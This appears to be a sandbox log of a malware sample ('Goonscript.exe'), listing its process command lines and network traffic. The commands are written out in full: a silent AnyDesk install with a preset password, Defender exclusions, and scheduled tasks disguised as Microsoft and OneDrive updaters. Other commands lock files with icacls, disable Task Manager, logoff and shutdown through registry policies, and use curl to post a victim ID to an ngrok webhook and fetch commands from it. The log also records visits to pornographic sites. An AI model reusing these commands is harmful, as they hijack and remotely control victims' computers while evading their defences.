"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6612 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7012 /prefetch:8
C:\Users\Admin\Downloads\Goonscript.exe
"C:\Users\Admin\Downloads\Goonscript.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\4987.tmp\4988.tmp\4989.vbs //Nologo
C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe
"C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4C08.tmp\4C09.tmp\4C0A.bat C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\stn.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\stn.exe" -r -force
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-service
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-control
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ctt.ac/Y6e79
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cc5346f8,0x7ff9cc534708,0x7ff9cc534718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --service
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --control
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData" -r -force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://spankbang.com/tv/?station=hypno+joi
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cc5346f8,0x7ff9cc534708,0x7ff9cc534718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f4 0x4ec
C:\Users\Admin\AppData\Roaming\locked.exe
"C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\86DE.tmp\86DF.tmp\86E0.bat C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7176 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/Anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk
C:\Windows\system32\schtasks.exe
schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData\stn.exe" /RL highest /SC ONLOGON /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData\Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData\svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData\conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /run /tn "MicrosoftEdgeUpdateTaskList"
C:\ProgramData\Anydesk.exe
C:\ProgramData\Anydesk.exe
C:\Windows\system32\schtasks.exe
schtasks /run /tn "SystemTaskNavigator"
C:\ProgramData\stn.exe
C:\ProgramData\stn.exe
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\B3EB.tmp\B3EC.bat C:\ProgramData\stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\timeout.exe
timeout /T 30 /NOBREAK
C:\ProgramData\Anydesk.exe
"C:\ProgramData\Anydesk.exe" --control
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\ProgramData\Anydesk.exe" --get-id
C:\ProgramData\AnyDesk.exe
C:\ProgramData\Anydesk.exe --get-id
C:\Windows\system32\curl.exe
curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"message\": \"Admin-786591712\"}" https://guiding-cheetah-vast.ngrok-free.app/webhook
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -X GET https://guiding-cheetah-vast.ngrok-free.app/command
C:\Windows\system32\curl.exe
curl -s -X GET https://guiding-cheetah-vast.ngrok-free.app/command
Network
| US | 8.8.8.8:53 | 159.72.75.146.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.42.244.104.in-addr.arpa | udp |
| N/A | 239.255.102.18:50002 | udp | |
| US | 8.8.8.8:53 | 2.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.188.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.140.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.141.128.57.in-addr.arpa | udp |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | video.twimg.com | udp |
| US | 8.8.8.8:53 | abs-0.twimg.com | udp |
| GB | 151.101.188.158:443 | video.twimg.com | tcp |
| US | 104.244.43.131:443 | abs-0.twimg.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 18.102.255.239.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.188.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.43.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 104.244.42.2:443 | api.x.com | tcp |
| US | 104.244.42.2:443 | api.x.com | tcp |
| US | 104.244.42.2:443 | api.x.com | tcp |
| US | 104.244.42.2:443 | api.x.com | tcp |
| US | 104.244.42.2:443 | api.x.com | tcp |
| US | 8.8.8.8:53 | 84.27.250.142.in-addr.arpa | udp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 104.19.130.98:443 | spankbang.com | tcp |
| US | 104.19.130.98:443 | spankbang.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 98.130.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hls-uranus.sb-cd.com | udp |
| US | 8.8.8.8:53 | tbi.sb-cd.com | udp |
| US | 104.16.4.5:443 | hls-uranus.sb-cd.com | tcp |
| NL | 185.76.10.17:443 | tbi.sb-cd.com | tcp |
| NL | 185.76.10.17:443 | tbi.sb-cd.com | tcp |
| US | 8.8.8.8:53 | c.ptgncdn.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| DE | 195.181.175.41:443 | c.ptgncdn.com | tcp |
| DE | 195.181.175.41:443 | c.ptgncdn.com | tcp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | tcp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | tcp |
| US | 104.16.4.5:443 | hls-uranus.sb-cd.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | assets.sb-cd.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | desire2do0961.spankbang.com | udp |
| US | 104.16.79.73:443 | static.cloudflareinsights.com | tcp |
| US | 104.16.5.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.5.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.5.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.5.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.5.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.5.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.5.5:443 | assets.sb-cd.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 104.19.130.98:443 | desire2do0961.spankbang.com | tcp |
| US | 8.8.8.8:53 | 5.4.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.10.76.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.175.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.33.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.24.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | creative.xlviirdr.com | udp |
| US | 104.21.54.71:443 | creative.xlviirdr.com | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | static.javhd.com | udp |
| US | 8.8.8.8:53 | stats.postgen.com | udp |
| US | 8.8.8.8:53 | 73.79.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.5.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.54.21.104.in-addr.arpa | udp |
| US | 104.21.54.71:443 | creative.xlviirdr.com | tcp |
| DE | 212.102.56.178:443 | static.javhd.com | tcp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| DE | 169.150.255.184:443 | a.magsrv.com | tcp |
| DE | 169.150.255.184:443 | a.magsrv.com | tcp |
| US | 8.8.8.8:53 | go.xlviirdr.com | udp |
| DE | 169.150.255.184:443 | a.magsrv.com | tcp |
| US | 8.8.8.8:53 | video.ktkjmp.com | udp |
| US | 104.18.40.50:443 | go.xlviirdr.com | tcp |
| US | 104.18.48.21:443 | video.ktkjmp.com | tcp |
| US | 104.18.40.50:443 | go.xlviirdr.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 178.56.102.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.182.117.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.255.150.169.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.40.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.48.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.magsrv.com | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | vstream-36.sb-cd.com | udp |
| US | 8.8.8.8:53 | stripchats.io | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 104.17.118.12:443 | stripchats.io | tcp |
| DE | 212.102.56.130:443 | vstream-36.sb-cd.com | tcp |
| US | 104.17.10.106:443 | img.strpst.com | tcp |
| US | 8.8.8.8:53 | s3t3d2y8.afcdn.net | udp |
| FR | 185.93.2.12:443 | s3t3d2y8.afcdn.net | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 246.229.211.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.118.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.56.102.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.10.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | edge-hls.doppiocdn.net | udp |
| CZ | 65.9.95.41:443 | edge-hls.doppiocdn.net | tcp |
| US | 8.8.8.8:53 | static.hotjar.com | udp |
| CZ | 65.9.95.86:443 | static.hotjar.com | tcp |
| US | 8.8.8.8:53 | crt.rootg2.amazontrust.com | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| CZ | 65.9.95.72:80 | crt.rootg2.amazontrust.com | tcp |
| US | 8.8.8.8:53 | 12.2.93.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.95.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.95.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| GB | 54.230.10.124:443 | script.hotjar.com | tcp |
| US | 8.8.8.8:53 | 94.95.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.10.230.54.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | b-hls-25.doppiocdn.net | udp |
| GB | 18.172.88.92:443 | b-hls-25.doppiocdn.net | tcp |
| GB | 18.172.88.92:443 | b-hls-25.doppiocdn.net | tcp |
| US | 8.8.8.8:53 | 72.95.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.88.172.18.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.playanext.com | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| CZ | 65.9.95.118:80 | api.playanext.com | tcp |
| US | 8.8.8.8:53 | 118.95.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | guiding-cheetah-vast.ngrok-free.app | udp |
| DE | 3.125.223.134:443 | guiding-cheetah-vast.ngrok-free.app | tcp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| GB | 2.23.210.82:80 | e5.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 134.223.125.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.210.23.2.in-addr.arpa | udp |
| DE | 3.125.223.134:443 | guiding-cheetah-vast.ngrok-free.app | tcp |
| US | 8.8.8.8:53 | cdn.tsyndicate.com | udp |
| NL | 45.133.44.71:443 | cdn.tsyndicate.com | tcp |
| US | 8.8.8.8:53 | s.magsrv.com | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | tsyndicate.com | udp |
| DE | 136.243.46.131:443 | tsyndicate.com | tcp |
| US | 8.8.8.8:53 | acdn.tsyndicate.com | udp |
| NL | 45.133.44.71:443 | acdn.tsyndicate.com | tcp |
| US | 8.8.8.8:53 | ts.trafget.com | udp |
| US | 8.8.8.8:53 | pxl.tsyndicate.com | udp |
| US | 172.67.128.119:443 | ts.trafget.com | tcp |
